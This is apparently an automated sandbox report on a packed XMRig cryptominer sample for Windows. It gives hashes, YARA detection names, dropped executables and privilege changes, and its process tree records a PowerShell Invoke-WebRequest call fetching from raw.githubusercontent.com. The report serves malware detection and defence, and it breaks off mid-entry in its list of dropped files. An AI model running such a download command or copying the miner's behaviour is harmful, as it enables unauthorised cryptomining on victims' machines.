xmrig | 2d6dd728c0358173a5804dede4867d99e4a5d1d789b22e300d93bb269ab34e04

Analysis

max time kernel
155s
max time network
166s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
28/03/2024, 18:45

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

2d6dd728c0358173a5804dede4867d99e4a5d1d789b22e300d93bb269ab34e04.exe
Size

1.9MB
MD5

71d1c79b072bdd6e6feea0949475dae9
SHA1

0789914be24698cedefba579028b9d26b59a625b
SHA256

2d6dd728c0358173a5804dede4867d99e4a5d1d789b22e300d93bb269ab34e04
SHA512

5644318167d135123828cd61327ee5e456d644310fd73726d2b85129659b4a35117590227a3a19f61519bd772bb33971a88d67a1d453c0ad85294cba7dca8e96
SSDEEP

49152:Lz071uv4BPMkibTIA5lCx7kvRWa4pXhIYCN:NABw

Score

10^/10

xmrig miner upx

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Detects executables containing URLs to raw contents of a Github gist 2 IoCs

resource	yara_rule
behavioral1/memory/2780-17-0x000000013FD80000-0x0000000140172000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral1/memory/2596-19-0x000000013F820000-0x000000013FC12000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL

UPX dump on OEP (original entry point) 32 IoCs

resource	yara_rule
behavioral1/memory/2840-0-0x000000013F970000-0x000000013FD62000-memory.dmp	UPX
behavioral1/files/0x0009000000012246-3.dat	UPX
behavioral1/files/0x00040000000130fc-16.dat	UPX
behavioral1/memory/2780-17-0x000000013FD80000-0x0000000140172000-memory.dmp	UPX
behavioral1/memory/2596-19-0x000000013F820000-0x000000013FC12000-memory.dmp	UPX
behavioral1/files/0x0009000000008527-23.dat	UPX
behavioral1/files/0x0008000000015bf3-24.dat	UPX
behavioral1/files/0x0007000000015c00-33.dat	UPX
behavioral1/files/0x0007000000015c14-37.dat	UPX
behavioral1/files/0x001300000001530d-40.dat	UPX
behavioral1/files/0x0009000000015c1e-48.dat	UPX
behavioral1/files/0x0008000000015e7d-52.dat	UPX
behavioral1/files/0x0006000000015e9c-55.dat	UPX
behavioral1/files/0x0006000000015f03-62.dat	UPX
behavioral1/files/0x000600000001601c-64.dat	UPX
behavioral1/files/0x000600000001607d-72.dat	UPX
behavioral1/files/0x0006000000016226-76.dat	UPX
behavioral1/files/0x00060000000162f3-78.dat	UPX
behavioral1/files/0x0006000000016432-86.dat	UPX
behavioral1/files/0x00060000000165e5-93.dat	UPX
behavioral1/files/0x0006000000016c85-124.dat	UPX
behavioral1/files/0x0006000000016c10-123.dat	UPX
behavioral1/files/0x0006000000016ad6-127.dat	UPX
behavioral1/files/0x0006000000016c07-131.dat	UPX
behavioral1/files/0x0006000000016c5c-132.dat	UPX
behavioral1/files/0x0006000000016bee-122.dat	UPX
behavioral1/files/0x0006000000016cc2-137.dat	UPX
behavioral1/files/0x00060000000167f6-121.dat	UPX
behavioral1/files/0x0006000000016cd2-144.dat	UPX
behavioral1/files/0x0006000000016ce6-154.dat	UPX
behavioral1/files/0x0006000000016d22-165.dat	UPX
behavioral1/files/0x0006000000016d12-162.dat	UPX

XMRig Miner payload 2 IoCs

miner

resource	yara_rule
behavioral1/memory/2780-17-0x000000013FD80000-0x0000000140172000-memory.dmp	xmrig
behavioral1/memory/2596-19-0x000000013F820000-0x000000013FC12000-memory.dmp	xmrig

Executes dropped EXE 12 IoCs

pid	Process
2780	DBZcyCT.exe
2596	xanygqw.exe
2512	oOfUZoP.exe
2792	MbjoecC.exe
2408	rSIaiTQ.exe
2544	QTPHBCE.exe
2380	PPMzFeG.exe
2444	XvjnPSq.exe
2884	COENKWo.exe
2192	srpRpHL.exe
1576	EfJuPFO.exe
584	fcDENJO.exe

Loads dropped DLL 12 IoCs

pid	Process
2840	2d6dd728c0358173a5804dede4867d99e4a5d1d789b22e300d93bb269ab34e04.exe
2840	2d6dd728c0358173a5804dede4867d99e4a5d1d789b22e300d93bb269ab34e04.exe
2840	2d6dd728c0358173a5804dede4867d99e4a5d1d789b22e300d93bb269ab34e04.exe
2840	2d6dd728c0358173a5804dede4867d99e4a5d1d789b22e300d93bb269ab34e04.exe
2840	2d6dd728c0358173a5804dede4867d99e4a5d1d789b22e300d93bb269ab34e04.exe
2840	2d6dd728c0358173a5804dede4867d99e4a5d1d789b22e300d93bb269ab34e04.exe
2840	2d6dd728c0358173a5804dede4867d99e4a5d1d789b22e300d93bb269ab34e04.exe
2840	2d6dd728c0358173a5804dede4867d99e4a5d1d789b22e300d93bb269ab34e04.exe
2840	2d6dd728c0358173a5804dede4867d99e4a5d1d789b22e300d93bb269ab34e04.exe
2840	2d6dd728c0358173a5804dede4867d99e4a5d1d789b22e300d93bb269ab34e04.exe
2840	2d6dd728c0358173a5804dede4867d99e4a5d1d789b22e300d93bb269ab34e04.exe
2840	2d6dd728c0358173a5804dede4867d99e4a5d1d789b22e300d93bb269ab34e04.exe

UPX packed file 32 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/2840-0-0x000000013F970000-0x000000013FD62000-memory.dmp	upx
behavioral1/files/0x0009000000012246-3.dat	upx
behavioral1/files/0x00040000000130fc-16.dat	upx
behavioral1/memory/2780-17-0x000000013FD80000-0x0000000140172000-memory.dmp	upx
behavioral1/memory/2596-19-0x000000013F820000-0x000000013FC12000-memory.dmp	upx
behavioral1/files/0x0009000000008527-23.dat	upx
behavioral1/files/0x0008000000015bf3-24.dat	upx
behavioral1/files/0x0007000000015c00-33.dat	upx
behavioral1/files/0x0007000000015c14-37.dat	upx
behavioral1/files/0x001300000001530d-40.dat	upx
behavioral1/files/0x0009000000015c1e-48.dat	upx
behavioral1/files/0x0008000000015e7d-52.dat	upx
behavioral1/files/0x0006000000015e9c-55.dat	upx
behavioral1/files/0x0006000000015f03-62.dat	upx
behavioral1/files/0x000600000001601c-64.dat	upx
behavioral1/files/0x000600000001607d-72.dat	upx
behavioral1/files/0x0006000000016226-76.dat	upx
behavioral1/files/0x00060000000162f3-78.dat	upx
behavioral1/files/0x0006000000016432-86.dat	upx
behavioral1/files/0x00060000000165e5-93.dat	upx
behavioral1/files/0x0006000000016c85-124.dat	upx
behavioral1/files/0x0006000000016c10-123.dat	upx
behavioral1/files/0x0006000000016ad6-127.dat	upx
behavioral1/files/0x0006000000016c07-131.dat	upx
behavioral1/files/0x0006000000016c5c-132.dat	upx
behavioral1/files/0x0006000000016bee-122.dat	upx
behavioral1/files/0x0006000000016cc2-137.dat	upx
behavioral1/files/0x00060000000167f6-121.dat	upx
behavioral1/files/0x0006000000016cd2-144.dat	upx
behavioral1/files/0x0006000000016ce6-154.dat	upx
behavioral1/files/0x0006000000016d22-165.dat	upx
behavioral1/files/0x0006000000016d12-162.dat	upx

Drops file in Windows directory 13 IoCs

description	ioc	Process
File created	C:\Windows\System\xanygqw.exe	2d6dd728c0358173a5804dede4867d99e4a5d1d789b22e300d93bb269ab34e04.exe
File created	C:\Windows\System\oOfUZoP.exe	2d6dd728c0358173a5804dede4867d99e4a5d1d789b22e300d93bb269ab34e04.exe
File created	C:\Windows\System\MbjoecC.exe	2d6dd728c0358173a5804dede4867d99e4a5d1d789b22e300d93bb269ab34e04.exe
File created	C:\Windows\System\rSIaiTQ.exe	2d6dd728c0358173a5804dede4867d99e4a5d1d789b22e300d93bb269ab34e04.exe
File created	C:\Windows\System\EfJuPFO.exe	2d6dd728c0358173a5804dede4867d99e4a5d1d789b22e300d93bb269ab34e04.exe
File created	C:\Windows\System\PPMzFeG.exe	2d6dd728c0358173a5804dede4867d99e4a5d1d789b22e300d93bb269ab34e04.exe
File created	C:\Windows\System\XvjnPSq.exe	2d6dd728c0358173a5804dede4867d99e4a5d1d789b22e300d93bb269ab34e04.exe
File created	C:\Windows\System\COENKWo.exe	2d6dd728c0358173a5804dede4867d99e4a5d1d789b22e300d93bb269ab34e04.exe
File created	C:\Windows\System\fcDENJO.exe	2d6dd728c0358173a5804dede4867d99e4a5d1d789b22e300d93bb269ab34e04.exe
File created	C:\Windows\System\DBZcyCT.exe	2d6dd728c0358173a5804dede4867d99e4a5d1d789b22e300d93bb269ab34e04.exe
File created	C:\Windows\System\QTPHBCE.exe	2d6dd728c0358173a5804dede4867d99e4a5d1d789b22e300d93bb269ab34e04.exe
File created	C:\Windows\System\rfPhRKk.exe	2d6dd728c0358173a5804dede4867d99e4a5d1d789b22e300d93bb269ab34e04.exe
File created	C:\Windows\System\srpRpHL.exe	2d6dd728c0358173a5804dede4867d99e4a5d1d789b22e300d93bb269ab34e04.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeLockMemoryPrivilege	2840	2d6dd728c0358173a5804dede4867d99e4a5d1d789b22e300d93bb269ab34e04.exe
Token: SeLockMemoryPrivilege	2840	2d6dd728c0358173a5804dede4867d99e4a5d1d789b22e300d93bb269ab34e04.exe

Suspicious use of WriteProcessMemory 39 IoCs

description	pid	Process	procid_target
PID 2840 wrote to memory of 1692	2840	2d6dd728c0358173a5804dede4867d99e4a5d1d789b22e300d93bb269ab34e04.exe	28
PID 2840 wrote to memory of 1692	2840	2d6dd728c0358173a5804dede4867d99e4a5d1d789b22e300d93bb269ab34e04.exe	28
PID 2840 wrote to memory of 1692	2840	2d6dd728c0358173a5804dede4867d99e4a5d1d789b22e300d93bb269ab34e04.exe	28
PID 2840 wrote to memory of 2780	2840	2d6dd728c0358173a5804dede4867d99e4a5d1d789b22e300d93bb269ab34e04.exe	29
PID 2840 wrote to memory of 2780	2840	2d6dd728c0358173a5804dede4867d99e4a5d1d789b22e300d93bb269ab34e04.exe	29
PID 2840 wrote to memory of 2780	2840	2d6dd728c0358173a5804dede4867d99e4a5d1d789b22e300d93bb269ab34e04.exe	29
PID 2840 wrote to memory of 2596	2840	2d6dd728c0358173a5804dede4867d99e4a5d1d789b22e300d93bb269ab34e04.exe	30
PID 2840 wrote to memory of 2596	2840	2d6dd728c0358173a5804dede4867d99e4a5d1d789b22e300d93bb269ab34e04.exe	30
PID 2840 wrote to memory of 2596	2840	2d6dd728c0358173a5804dede4867d99e4a5d1d789b22e300d93bb269ab34e04.exe	30
PID 2840 wrote to memory of 2512	2840	2d6dd728c0358173a5804dede4867d99e4a5d1d789b22e300d93bb269ab34e04.exe	31
PID 2840 wrote to memory of 2512	2840	2d6dd728c0358173a5804dede4867d99e4a5d1d789b22e300d93bb269ab34e04.exe	31
PID 2840 wrote to memory of 2512	2840	2d6dd728c0358173a5804dede4867d99e4a5d1d789b22e300d93bb269ab34e04.exe	31
PID 2840 wrote to memory of 2792	2840	2d6dd728c0358173a5804dede4867d99e4a5d1d789b22e300d93bb269ab34e04.exe	32
PID 2840 wrote to memory of 2792	2840	2d6dd728c0358173a5804dede4867d99e4a5d1d789b22e300d93bb269ab34e04.exe	32
PID 2840 wrote to memory of 2792	2840	2d6dd728c0358173a5804dede4867d99e4a5d1d789b22e300d93bb269ab34e04.exe	32
PID 2840 wrote to memory of 2408	2840	2d6dd728c0358173a5804dede4867d99e4a5d1d789b22e300d93bb269ab34e04.exe	33
PID 2840 wrote to memory of 2408	2840	2d6dd728c0358173a5804dede4867d99e4a5d1d789b22e300d93bb269ab34e04.exe	33
PID 2840 wrote to memory of 2408	2840	2d6dd728c0358173a5804dede4867d99e4a5d1d789b22e300d93bb269ab34e04.exe	33
PID 2840 wrote to memory of 2544	2840	2d6dd728c0358173a5804dede4867d99e4a5d1d789b22e300d93bb269ab34e04.exe	34
PID 2840 wrote to memory of 2544	2840	2d6dd728c0358173a5804dede4867d99e4a5d1d789b22e300d93bb269ab34e04.exe	34
PID 2840 wrote to memory of 2544	2840	2d6dd728c0358173a5804dede4867d99e4a5d1d789b22e300d93bb269ab34e04.exe	34
PID 2840 wrote to memory of 2380	2840	2d6dd728c0358173a5804dede4867d99e4a5d1d789b22e300d93bb269ab34e04.exe	35
PID 2840 wrote to memory of 2380	2840	2d6dd728c0358173a5804dede4867d99e4a5d1d789b22e300d93bb269ab34e04.exe	35
PID 2840 wrote to memory of 2380	2840	2d6dd728c0358173a5804dede4867d99e4a5d1d789b22e300d93bb269ab34e04.exe	35
PID 2840 wrote to memory of 2444	2840	2d6dd728c0358173a5804dede4867d99e4a5d1d789b22e300d93bb269ab34e04.exe	36
PID 2840 wrote to memory of 2444	2840	2d6dd728c0358173a5804dede4867d99e4a5d1d789b22e300d93bb269ab34e04.exe	36
PID 2840 wrote to memory of 2444	2840	2d6dd728c0358173a5804dede4867d99e4a5d1d789b22e300d93bb269ab34e04.exe	36
PID 2840 wrote to memory of 2884	2840	2d6dd728c0358173a5804dede4867d99e4a5d1d789b22e300d93bb269ab34e04.exe	37
PID 2840 wrote to memory of 2884	2840	2d6dd728c0358173a5804dede4867d99e4a5d1d789b22e300d93bb269ab34e04.exe	37
PID 2840 wrote to memory of 2884	2840	2d6dd728c0358173a5804dede4867d99e4a5d1d789b22e300d93bb269ab34e04.exe	37
PID 2840 wrote to memory of 2192	2840	2d6dd728c0358173a5804dede4867d99e4a5d1d789b22e300d93bb269ab34e04.exe	38
PID 2840 wrote to memory of 2192	2840	2d6dd728c0358173a5804dede4867d99e4a5d1d789b22e300d93bb269ab34e04.exe	38
PID 2840 wrote to memory of 2192	2840	2d6dd728c0358173a5804dede4867d99e4a5d1d789b22e300d93bb269ab34e04.exe	38
PID 2840 wrote to memory of 1576	2840	2d6dd728c0358173a5804dede4867d99e4a5d1d789b22e300d93bb269ab34e04.exe	39
PID 2840 wrote to memory of 1576	2840	2d6dd728c0358173a5804dede4867d99e4a5d1d789b22e300d93bb269ab34e04.exe	39
PID 2840 wrote to memory of 1576	2840	2d6dd728c0358173a5804dede4867d99e4a5d1d789b22e300d93bb269ab34e04.exe	39
PID 2840 wrote to memory of 584	2840	2d6dd728c0358173a5804dede4867d99e4a5d1d789b22e300d93bb269ab34e04.exe	40
PID 2840 wrote to memory of 584	2840	2d6dd728c0358173a5804dede4867d99e4a5d1d789b22e300d93bb269ab34e04.exe	40
PID 2840 wrote to memory of 584	2840	2d6dd728c0358173a5804dede4867d99e4a5d1d789b22e300d93bb269ab34e04.exe	40

C:\Users\Admin\AppData\Local\Temp\2d6dd728c0358173a5804dede4867d99e4a5d1d789b22e300d93bb269ab34e04.exe
"C:\Users\Admin\AppData\Local\Temp\2d6dd728c0358173a5804dede4867d99e4a5d1d789b22e300d93bb269ab34e04.exe"
1⤵
- Loads dropped DLL
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2840
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
  2⤵
  PID:1692
- C:\Windows\System\DBZcyCT.exe
  C:\Windows\System\DBZcyCT.exe
  2⤵
  - Executes dropped EXE
  PID:2780
- C:\Windows\System\xanygqw.exe
  C:\Windows\System\xanygqw.exe
  2⤵
  - Executes dropped EXE
  PID:2596
- C:\Windows\System\oOfUZoP.exe
  C:\Windows\System\oOfUZoP.exe
  2⤵
  - Executes dropped EXE
  PID:2512
- C:\Windows\System\MbjoecC.exe
  C:\Windows\System\MbjoecC.exe
  2⤵
  - Executes dropped EXE
  PID:2792
- C:\Windows\System\rSIaiTQ.exe
  C:\Windows\System\rSIaiTQ.exe
  2⤵
  - Executes dropped EXE
  PID:2408
- C:\Windows\System\QTPHBCE.exe
  C:\Windows\System\QTPHBCE.exe
  2⤵
  - Executes dropped EXE
  PID:2544
- C:\Windows\System\PPMzFeG.exe
  C:\Windows\System\PPMzFeG.exe
  2⤵
  - Executes dropped EXE
  PID:2380
- C:\Windows\System\XvjnPSq.exe
  C:\Windows\System\XvjnPSq.exe
  2⤵
  - Executes dropped EXE
  PID:2444
- C:\Windows\System\COENKWo.exe
  C:\Windows\System\COENKWo.exe
  2⤵
  - Executes dropped EXE
  PID:2884
- C:\Windows\System\srpRpHL.exe
  C:\Windows\System\srpRpHL.exe
  2⤵
  - Executes dropped EXE
  PID:2192
- C:\Windows\System\EfJuPFO.exe
  C:\Windows\System\EfJuPFO.exe
  2⤵
  - Executes dropped EXE
  PID:1576
- C:\Windows\System\fcDENJO.exe
  C:\Windows\System\fcDENJO.exe
  2⤵
  - Executes dropped EXE
  PID:584
- C:\Windows\System\rfPhRKk.exe
  C:\Windows\System\rfPhRKk.exe
  2⤵
  PID:1620
- C:\Windows\System\mJiYTYa.exe
  C:\Windows\System\mJiYTYa.exe
  2⤵
  PID:2684
- C:\Windows\System\VSPrGJW.exe
  C:\Windows\System\VSPrGJW.exe
  2⤵
  PID:1928
- C:\Windows\System\VOkzwKp.exe
  C:\Windows\System\VOkzwKp.exe
  2⤵
  PID:284
- C:\Windows\System\DQJMZCg.exe
  C:\Windows\System\DQJMZCg.exe
  2⤵
  PID:2292
- C:\Windows\System\kpnIUyV.exe
  C:\Windows\System\kpnIUyV.exe
  2⤵
  PID:1476
- C:\Windows\System\knACggN.exe
  C:\Windows\System\knACggN.exe
  2⤵
  PID:2256
- C:\Windows\System\HJvaDyP.exe
  C:\Windows\System\HJvaDyP.exe
  2⤵
  PID:2100
- C:\Windows\System\QHDdLMX.exe
  C:\Windows\System\QHDdLMX.exe
  2⤵
  PID:2480
- C:\Windows\System\bWytMpb.exe
  C:\Windows\System\bWytMpb.exe
  2⤵
  PID:2020
- C:\Windows\System\ZGOZgiV.exe
  C:\Windows\System\ZGOZgiV.exe
  2⤵
  PID:1944
- C:\Windows\System\tvgLRkX.exe
  C:\Windows\System\tvgLRkX.exe
  2⤵
  PID:2232
- C:\Windows\System\UIXpblh.exe
  C:\Windows\System\UIXpblh.exe
  2⤵
  PID:2224
- C:\Windows\System\zWXYXVP.exe
  C:\Windows\System\zWXYXVP.exe
  2⤵
  PID:1520
- C:\Windows\System\ruMNuNw.exe
  C:\Windows\System\ruMNuNw.exe
  2⤵
  PID:2760
- C:\Windows\System\VTffzKH.exe
  C:\Windows\System\VTffzKH.exe
  2⤵
  PID:440
- C:\Windows\System\IzfZdSO.exe
  C:\Windows\System\IzfZdSO.exe
  2⤵
  PID:3348
- C:\Windows\System\faLWywM.exe
  C:\Windows\System\faLWywM.exe
  2⤵
  PID:3512
- C:\Windows\System\nyXOFXD.exe
  C:\Windows\System\nyXOFXD.exe
  2⤵
  PID:3752
- C:\Windows\System\KHQPTim.exe
  C:\Windows\System\KHQPTim.exe
  2⤵
  PID:3768
- C:\Windows\System\HwjKRNV.exe
  C:\Windows\System\HwjKRNV.exe
  2⤵
  PID:2892
- C:\Windows\System\VmpBGgT.exe
  C:\Windows\System\VmpBGgT.exe
  2⤵
  PID:1600
- C:\Windows\System\tOsYRzn.exe
  C:\Windows\System\tOsYRzn.exe
  2⤵
  PID:1536
- C:\Windows\System\ckDJKiE.exe
  C:\Windows\System\ckDJKiE.exe
  2⤵
  PID:1964
- C:\Windows\System\SiKjfqY.exe
  C:\Windows\System\SiKjfqY.exe
  2⤵
  PID:3716
- C:\Windows\System\JSzHfbU.exe
  C:\Windows\System\JSzHfbU.exe
  2⤵
  PID:4184
- C:\Windows\System\PluDGMf.exe
  C:\Windows\System\PluDGMf.exe
  2⤵
  PID:4200
- C:\Windows\System\kPpFCTp.exe
  C:\Windows\System\kPpFCTp.exe
  2⤵
  PID:4372
- C:\Windows\System\UeBMMsg.exe
  C:\Windows\System\UeBMMsg.exe
  2⤵
  PID:5032
- C:\Windows\System\aUprqOH.exe
  C:\Windows\System\aUprqOH.exe
  2⤵
  PID:5048
- C:\Windows\System\HZNfZEm.exe
  C:\Windows\System\HZNfZEm.exe
  2⤵
  PID:4196
- C:\Windows\System\QGFpzhp.exe
  C:\Windows\System\QGFpzhp.exe
  2⤵
  PID:2288
- C:\Windows\System\QIOuACz.exe
  C:\Windows\System\QIOuACz.exe
  2⤵
  PID:4852
- C:\Windows\System\aXhaRRQ.exe
  C:\Windows\System\aXhaRRQ.exe
  2⤵
  PID:4724
- C:\Windows\System\MmIArBX.exe
  C:\Windows\System\MmIArBX.exe
  2⤵
  PID:4816
- C:\Windows\System\hImanii.exe
  C:\Windows\System\hImanii.exe
  2⤵
  PID:4912
- C:\Windows\System\tyiJMii.exe
  C:\Windows\System\tyiJMii.exe
  2⤵
  PID:4980
- C:\Windows\System\NvzWGgv.exe
  C:\Windows\System\NvzWGgv.exe
  2⤵
  PID:5044
- C:\Windows\System\CqEgCpQ.exe
  C:\Windows\System\CqEgCpQ.exe
  2⤵
  PID:2696
- C:\Windows\System\HqvCnDp.exe
  C:\Windows\System\HqvCnDp.exe
  2⤵
  PID:3436
- C:\Windows\System\PKbilUK.exe
  C:\Windows\System\PKbilUK.exe
  2⤵
  PID:2956
- C:\Windows\System\BQBYcPV.exe
  C:\Windows\System\BQBYcPV.exe
  2⤵
  PID:4164
- C:\Windows\System\HWRuKGx.exe
  C:\Windows\System\HWRuKGx.exe
  2⤵
  PID:4612
- C:\Windows\System\xOKwqhI.exe
  C:\Windows\System\xOKwqhI.exe
  2⤵
  PID:4468
- C:\Windows\System\FMPlymI.exe
  C:\Windows\System\FMPlymI.exe
  2⤵
  PID:5068
- C:\Windows\System\CDPnsdQ.exe
  C:\Windows\System\CDPnsdQ.exe
  2⤵
  PID:3228
- C:\Windows\System\ceKoCke.exe
  C:\Windows\System\ceKoCke.exe
  2⤵
  PID:2108
- C:\Windows\System\glzpHxL.exe
  C:\Windows\System\glzpHxL.exe
  2⤵
  PID:4112
- C:\Windows\System\mcjbjuP.exe
  C:\Windows\System\mcjbjuP.exe
  2⤵
  PID:5296
- C:\Windows\System\AEcIHhx.exe
  C:\Windows\System\AEcIHhx.exe
  2⤵
  PID:5616
- C:\Windows\System\KJcZfEC.exe
  C:\Windows\System\KJcZfEC.exe
  2⤵
  PID:1104
- C:\Windows\System\ySoJqua.exe
  C:\Windows\System\ySoJqua.exe
  2⤵
  PID:6416
- C:\Windows\System\odizQGu.exe
  C:\Windows\System\odizQGu.exe
  2⤵
  PID:6880
- C:\Windows\System\dKyoEjb.exe
  C:\Windows\System\dKyoEjb.exe
  2⤵
  PID:7056
- C:\Windows\System\PpZVfWj.exe
  C:\Windows\System\PpZVfWj.exe
  2⤵
  PID:5784
- C:\Windows\System\OgELjSa.exe
  C:\Windows\System\OgELjSa.exe
  2⤵
  PID:5976
- C:\Windows\System\hSicpMF.exe
  C:\Windows\System\hSicpMF.exe
  2⤵
  PID:5996
- C:\Windows\System\CTwHnkT.exe
  C:\Windows\System\CTwHnkT.exe
  2⤵
  PID:6328
- C:\Windows\System\IqhoeVv.exe
  C:\Windows\System\IqhoeVv.exe
  2⤵
  PID:6104
- C:\Windows\System\wOMYKGe.exe
  C:\Windows\System\wOMYKGe.exe
  2⤵
  PID:7108
- C:\Windows\System\AvIMUNx.exe
  C:\Windows\System\AvIMUNx.exe
  2⤵
  PID:7140
- C:\Windows\System\UZIhrSW.exe
  C:\Windows\System\UZIhrSW.exe
  2⤵
  PID:7632
- C:\Windows\System\pjPhgul.exe
  C:\Windows\System\pjPhgul.exe
  2⤵
  PID:7888
- C:\Windows\System\HJJYvta.exe
  C:\Windows\System\HJJYvta.exe
  2⤵
  PID:8112
- C:\Windows\System\WfasXvz.exe
  C:\Windows\System\WfasXvz.exe
  2⤵
  PID:7200
- C:\Windows\System\rQUNsma.exe
  C:\Windows\System\rQUNsma.exe
  2⤵
  PID:7772
- C:\Windows\System\dcbDrkM.exe
  C:\Windows\System\dcbDrkM.exe
  2⤵
  PID:5920
- C:\Windows\System\XQotVZR.exe
  C:\Windows\System\XQotVZR.exe
  2⤵
  PID:7688
- C:\Windows\System\BLaNhcQ.exe
  C:\Windows\System\BLaNhcQ.exe
  2⤵
  PID:7720
- C:\Windows\System\ldjsBvD.exe
  C:\Windows\System\ldjsBvD.exe
  2⤵
  PID:8220
- C:\Windows\System\kWKuCpB.exe
  C:\Windows\System\kWKuCpB.exe
  2⤵
  PID:8236
- C:\Windows\System\IDHGpUO.exe
  C:\Windows\System\IDHGpUO.exe
  2⤵
  PID:8252
- C:\Windows\System\KtufDEn.exe
  C:\Windows\System\KtufDEn.exe
  2⤵
  PID:8268
- C:\Windows\System\EOVNSej.exe
  C:\Windows\System\EOVNSej.exe
  2⤵
  PID:8292
- C:\Windows\System\RehmrLk.exe
  C:\Windows\System\RehmrLk.exe
  2⤵
  PID:8496
- C:\Windows\System\IpoqPBQ.exe
  C:\Windows\System\IpoqPBQ.exe
  2⤵
  PID:8512
- C:\Windows\System\KOjfpCS.exe
  C:\Windows\System\KOjfpCS.exe
  2⤵
  PID:8712
- C:\Windows\System\ehsXDct.exe
  C:\Windows\System\ehsXDct.exe
  2⤵
  PID:9188
- C:\Windows\System\DOIIchz.exe
  C:\Windows\System\DOIIchz.exe
  2⤵
  PID:8284

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Windows\system\COENKWo.exe

Filesize
1.9MB

MD5
c6e1c7cec8fa7ff4b63138137fee9ea5

SHA1
73b953cde8622e889e20656f40cfc9c4483a48aa

SHA256
881e7a103f230e488dd833a6d8b38935ed3c35121231def90f3149eb43f77ce0

SHA512
031cbde5c97047fc3ef362f80c3dae198636b9bbf61730c68654661bd385dc299bb2d9b5c0f44b826ca8fc2d3e7319db63ea8a87275ab071b9bbf2e9e43d77fd

Download Submit
C:\Windows\system\EMPyPOE.exe

Filesize
1.9MB

MD5
b23dcfb7f6441e9ce896dd8e23d30942

SHA1
c5fb548f616fb3b7a34429b82f32303656896023

SHA256
fcabf3b1b001c582d3464682350192b9e7628e77e71452ab4e0f61ca9a6497a3

SHA512
40faeb2afc23864ac65995249d8a25e4c0fda6edcab2f85de14c38603dafe5c1e441799fd038cccc12b16b75f1f8432e453537e5bf7adf2fce29f14d395885cb

Download Submit
C:\Windows\system\EfJuPFO.exe

Filesize
1.9MB

MD5
7d9b94c7e5e8d2ecbd6bd6ebf1667d87

SHA1
047c5596f0597e5467890277e2f8d1187a9c8899

SHA256
b477410f190f114f0f575645c50eaa852657e511af042ca074c521a50a0a6b28

SHA512
0b005744512ce4cfb963e66c813d97190bad7c6c3862f0639eb6e78982e3fe6b27842886446bff7d7e5448248792f966791e5060d3c635b600ef0beeec9c9094

Download Submit
C:\Windows\system\IrblahU.exe

Filesize
1.9MB

MD5
a31c23b49dbae933a49a4a3ba6c310d8

SHA1
aa4efb46c9c3b4686b9726bf74bce4f40dbac836

SHA256
13ef06008b3d39ae880ff0787bc12d98b0f5144ce23244e44415e0b8c3026e29

SHA512
4f7eb9d75b3d40c30753fea94029b74e9a041ea135bd89ec93dfd8869acbb7e8fa2d66a200119c29bca1ad382e0472a28c37c80c420fa5e36ae82f17dff762fc

Download Submit
C:\Windows\system\PgkrYmB.exe

Filesize
1.9MB

MD5
e77afa907b36eeb6405d96227d587544

SHA1
f484a28abca610ec20199cf4c3c5582deaae888c

SHA256
c98ceed6cd7d78fc91ad724564a3c79ec078c84cd590cff0e45127a608e521ea

SHA512
11468da8a5a0aaa5d1f3d3172bd63383cf5b470b3696633d4f159bd4cbbc68609d6fab316f3d9d81e7262c07ae0971b080d50bf7988710f04bb3ce3df88543d2

Download Submit
C:\Windows\system\QTPHBCE.exe

Filesize
1.9MB

MD5
fdcdce3f4b423ec2b775b192dbd6d44d

SHA1
d8dd9390d6d41296bebd3e16569f82fc7ea27542

SHA256
66917322fd20059624509b2ba55fe9f662a21873d2f24c9b35e3921849be9a7b

SHA512
ac2f4ba8c5a71a7ee061be55d6109f41e8b9d5084bf861c0080f43de3dd26682ce9b9205865c62a5187f2e7d4162b9ddd29bdd9123bf5b8404ccb1087f444765

Download Submit
C:\Windows\system\VOkzwKp.exe

Filesize
1.9MB

MD5
7035ef169ac2d382b42507f315020fa7

SHA1
7e68953bf3a1a0e7c815cfe9a0f554e9091d6c89

SHA256
a8acd163eed8f6beeaa5f446e28981f3367f8250c2feb0b6c61c4601a1e1a727

SHA512
af11677cb8bdd5abf85de481cb9ef39f706caf5becb7ab61ae36896cc50e17a0f2294be74757cb8b23ee2e70c3e38dde1a738f89dfd8755b7fd16ddd4fefbc21

Download Submit
C:\Windows\system\XvjnPSq.exe

Filesize
1.9MB

MD5
ee082d5237258e96f01f8374d6d60039

SHA1
7a4865801296aaf6c441d3fd4fde925b396dce12

SHA256
9e461a3cfe666a876db189786c31036ac33bd5571586ce8e10baf26ff9dae546

SHA512
e576208a6317a8de2188d0550e1f6684561bc51bb27b4574d490faf8e6da70bcf0b181f6de834c390a8c25ed687a1933a4c79ea66ffe5952a9296d0427984d7c

Download Submit
C:\Windows\system\bAEGgaB.exe

Filesize
1.9MB

MD5
dc84ddd3e27ce5c6253caf4d88d5999c

SHA1
ffb3ae4303467caf40fed88530911d2865b40d45

SHA256
209a88101ccb3d90cf325965b19619887c5850a4e8cea8396252b21a5148a064

SHA512
cd1ada129105b46d4538975891f4c4358c5efb55ab97665f53e961feebc9b53b2bec4ce16fc533b1600ff03ae7b2950d2d02a46b33acb2ec6a0af269625fa670

Download Submit
C:\Windows\system\fbQptbL.exe

Filesize
1.9MB

MD5
f0e82e9094e9e93e5a048819f2c00cda

SHA1
5693908d7819a311243aa369fbfe00587b23ffed

SHA256
a694b0fec6d51dd95c0d5ee41a67bd94a0a886f2c91809c3603f625e210a527d

SHA512
5356409ec2ed4ff5e5a1aa914e9e3931f071f43531b38ccb16bb2ab029f52187cc542c472836de040679bf323e1c9109daf4e21194b99a1d958633cd90100765

Download Submit
C:\Windows\system\kfAVJgd.exe

Filesize
1.9MB

MD5
